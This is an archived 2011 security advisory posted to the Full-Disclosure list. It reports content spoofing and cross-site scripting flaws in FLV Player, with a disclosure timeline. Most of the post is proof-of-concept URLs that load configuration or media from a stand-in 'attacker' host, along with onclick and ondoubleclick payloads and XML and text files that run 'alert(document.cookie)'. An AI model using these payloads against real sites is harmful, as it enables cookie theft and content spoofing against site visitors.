| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 22 Aug 2011 18:42:00 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: Vulnerabilities in FLV Player Hello list! I want to warn you about Content Spoofing and Cross-Site Scripting vulnerabilities in FLV Player. ------------------------- Affected products: ------------------------- Vulnerable are different versions of FLV Player (MINI, NORMAL, MAXI and MULTI). Note, that version NORMAL occurs under names player_flv.swf and player_flv_classic.swf. The author of FLV Player didn't fix these vulnerabilities. ---------- Details: ---------- Content Spoofing (WASC-12): Flash-files of player FLV Player accept arbitrary addresses in parameter configxml, which allows to spoof content of flash - i.e. by setting address of configuration file from other site. http://site/player_flv.swf?configxml=http://attacker/1.xml http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml http://site/player_flv_multi.swf?configxml=http://attacker/1.xml Flash-files of player FLV Player accept arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of configuration file from other site. http://site/player_flv.swf?config=http://attacker/1.txt http://site/player_flv_maxi.swf?config=http://attacker/1.txt http://site/player_flv_multi.swf?config=http://attacker/1.txt Flash-files of player FLV Player allow to spoof all important parameters, including flv and startimage, and at that accept arbitrary addresses in parameters flv and startimage, which allows to spoof content of flash - i.e. by setting addresses of video and image from other site. And for setting of links at arbitrary site it's possible to use parameters onclick and ondoubleclick. http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg http://site/player_flv_mini.swf?flv=http://attacker/1.flv XSS (WASC-08): http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie) http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie) http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie) http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml File xss.xml: <?xml version="1.0" encoding="UTF-8"?> <config> <param name="onclick" value="javascript:alert(document.cookie)" /> <param name="ondoubleclick" value="javascript:alert(document.cookie)" /> </config> http://site/player_flv_maxi.swf?config=http://attacker/xss.txt http://site/player_flv_multi.swf?config=http://attacker/xss.txt File xss.txt: onclick=javascript:alert(document.cookie) ondoubleclick=javascript:alert(document.cookie) The code will execute after a click (or double click). It's strictly social XSS. ------------ Timeline: ------------ 2011.02.24 - found these vulnerabilities in different versions of the player and informed owner of the site which used it. 2011.04.21 - announced at my site. 2011.04.22 - informed developer. 2011.08.20 - disclosed at my site. I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/5098/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists